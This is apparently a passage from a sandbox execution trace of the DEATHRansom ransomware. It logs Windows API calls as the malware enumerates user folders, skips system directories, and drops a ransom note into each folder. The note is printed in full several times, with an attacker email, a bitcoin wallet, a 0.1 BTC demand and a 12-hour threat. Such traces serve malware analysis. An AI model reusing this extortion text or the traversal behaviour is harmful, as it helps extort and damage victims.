ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.821] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.822] CloseHandle (hObject=0x7b4) returned 1 [0075.823] GetProcessHeap () returned 0x4f10000 [0075.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d710c8 | out: hHeap=0x4f10000) returned 1 [0075.823] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.823] wnsprintfW (in: pszDest=0x8ce1080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0075.823] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d43b2a0, ftCreationTime.dwHighDateTime=0x1d4d549, ftLastAccessTime.dwLowDateTime=0xe82fc560, ftLastAccessTime.dwHighDateTime=0x1d4d1ce, ftLastWriteTime.dwLowDateTime=0xe82fc560, ftLastWriteTime.dwHighDateTime=0x1d4d1ce, nFileSizeHigh=0x0, nFileSizeLow=0x54ae, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="lsf0tqH.m4a", cAlternateFileName="")) returned 1 [0075.823] wnsprintfW (in: pszDest=0x8ce1080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lsf0tqH.m4a") returned 51 [0075.823] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24822120, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0075.823] wnsprintfW (in: pszDest=0x8ce1080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\read_me.txt") returned 51 [0075.823] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a9a6970, ftCreationTime.dwHighDateTime=0x1d4d3db, ftLastAccessTime.dwLowDateTime=0x98e2c0b0, ftLastAccessTime.dwHighDateTime=0x1d4c752, ftLastWriteTime.dwLowDateTime=0x98e2c0b0, ftLastWriteTime.dwHighDateTime=0x1d4c752, nFileSizeHigh=0x0, nFileSizeLow=0x66fb, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="yIEkfQCxcOzoyh.m4a", cAlternateFileName="YIEKFQ~1.M4A")) returned 1 [0075.823] wnsprintfW (in: pszDest=0x8ce1080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\yIEkfQCxcOzoyh.m4a") returned 58 [0075.823] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a9a6970, ftCreationTime.dwHighDateTime=0x1d4d3db, ftLastAccessTime.dwLowDateTime=0x98e2c0b0, ftLastAccessTime.dwHighDateTime=0x1d4c752, ftLastWriteTime.dwLowDateTime=0x98e2c0b0, ftLastWriteTime.dwHighDateTime=0x1d4c752, nFileSizeHigh=0x0, nFileSizeLow=0x66fb, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="yIEkfQCxcOzoyh.m4a", cAlternateFileName="YIEKFQ~1.M4A")) returned 0 [0075.823] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0075.823] wnsprintfW (in: pszDest=0x8ce1080, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\read_me.txt") returned 51 [0075.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.823] GetProcessHeap () returned 0x4f10000 [0075.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ce1080 | out: hHeap=0x4f10000) returned 1 [0075.823] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0075.823] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned 46 [0075.823] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0075.823] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0075.823] StrStrW (lpFirst="my documents", lpSrch="programdata") returned 0x0 [0075.823] StrStrW (lpFirst="my documents", lpSrch="$recycle.bin") returned 0x0 [0075.823] StrStrW (lpFirst="my documents", lpSrch="program files") returned 0x0 [0075.824] StrStrW (lpFirst="my documents", lpSrch="windows") returned 0x0 [0075.824] StrStrW (lpFirst="my documents", lpSrch="all users") returned 0x0 [0075.824] StrStrW (lpFirst="my documents", lpSrch="appdata") returned 0x0 [0075.824] GetProcessHeap () returned 0x4f10000 [0075.824] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ce1080 [0075.824] lstrcpyW (in: lpString1=0x8ce1080, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0075.824] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 77 [0075.824] QueueUserWorkItem (Function=0x40a710, Context=0x8ce1080, Flags=0x0) returned 1 [0075.824] GetProcessHeap () returned 0x4f10000 [0075.824] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d710c8 [0075.824] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*") returned 48 [0075.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a9a6970, ftCreationTime.dwHighDateTime=0x1d4d3db, ftLastAccessTime.dwLowDateTime=0x98e2c0b0, ftLastAccessTime.dwHighDateTime=0x1d4c752, ftLastWriteTime.dwLowDateTime=0x98e2c0b0, ftLastWriteTime.dwHighDateTime=0x1d4c752, nFileSizeHigh=0x0, nFileSizeLow=0x66fb, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="yIEkfQCxcOzoyh.m4a", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0075.824] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\read_me.txt") returned 58 [0075.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.824] GetProcessHeap () returned 0x4f10000 [0075.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d710c8 | out: hHeap=0x4f10000) returned 1 [0075.824] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NetHood", cAlternateFileName="")) returned 1 [0075.824] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned 41 [0075.824] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0075.824] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0075.824] StrStrW (lpFirst="nethood", lpSrch="programdata") returned 0x0 [0075.824] StrStrW (lpFirst="nethood", lpSrch="$recycle.bin") returned 0x0 [0075.824] StrStrW (lpFirst="nethood", lpSrch="program files") returned 0x0 [0075.824] StrStrW (lpFirst="nethood", lpSrch="windows") returned 0x0 [0075.824] StrStrW (lpFirst="nethood", lpSrch="all users") returned 0x0 [0075.825] StrStrW (lpFirst="nethood", lpSrch="appdata") returned 0x0 [0075.825] GetProcessHeap () returned 0x4f10000 [0075.825] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d710c8 [0075.825] lstrcpyW (in: lpString1=0x8d710c8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0075.825] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 78 [0075.825] QueueUserWorkItem (Function=0x40a710, Context=0x8d710c8, Flags=0x0) returned 1 [0075.825] GetProcessHeap () returned 0x4f10000 [0075.825] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d810d0 [0075.826] wnsprintfW (in: pszDest=0x8d810d0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*") returned 43 [0075.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a9a6970, ftCreationTime.dwHighDateTime=0x1d4d3db, ftLastAccessTime.dwLowDateTime=0x98e2c0b0, ftLastAccessTime.dwHighDateTime=0x1d4c752, ftLastWriteTime.dwLowDateTime=0x98e2c0b0, ftLastWriteTime.dwHighDateTime=0x1d4c752, nFileSizeHigh=0x0, nFileSizeLow=0x66fb, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="yIEkfQCxcOzoyh.m4a", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0075.826] wnsprintfW (in: pszDest=0x8d810d0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\read_me.txt") returned 53 [0075.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.827] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.827] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.827] CloseHandle (hObject=0x7a0) returned 1 [0075.828] GetProcessHeap () returned 0x4f10000 [0075.828] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d810d0 | out: hHeap=0x4f10000) returned 1 [0075.828] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0075.828] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 44 [0075.828] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0075.828] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0075.828] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0075.828] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned 49 [0075.828] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0075.828] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0075.828] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0075.828] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0075.828] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0075.828] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0075.828] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0075.828] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0075.828] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c08ef0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2c08ef0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Pictures", cAlternateFileName="")) returned 1 [0075.828] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 42 [0075.828] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0075.828] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0075.828] StrStrW (lpFirst="pictures", lpSrch="programdata") returned 0x0 [0075.828] StrStrW (lpFirst="pictures", lpSrch="$recycle.bin") returned 0x0 [0075.828] StrStrW (lpFirst="pictures", lpSrch="program files") returned 0x0 [0075.828] StrStrW (lpFirst="pictures", lpSrch="windows") returned 0x0 [0075.828] StrStrW (lpFirst="pictures", lpSrch="all users") returned 0x0 [0075.828] StrStrW (lpFirst="pictures", lpSrch="appdata") returned 0x0 [0075.829] GetProcessHeap () returned 0x4f10000 [0075.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d810d0 [0075.829] lstrcpyW (in: lpString1=0x8d810d0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0075.829] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 79 [0075.829] QueueUserWorkItem (Function=0x40a710, Context=0x8d810d0, Flags=0x0) returned 1 [0075.829] GetProcessHeap () returned 0x4f10000 [0075.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d910d8 [0075.829] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned 44 [0075.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.829] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\.") returned 44 [0075.829] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.829] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.829] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.829] 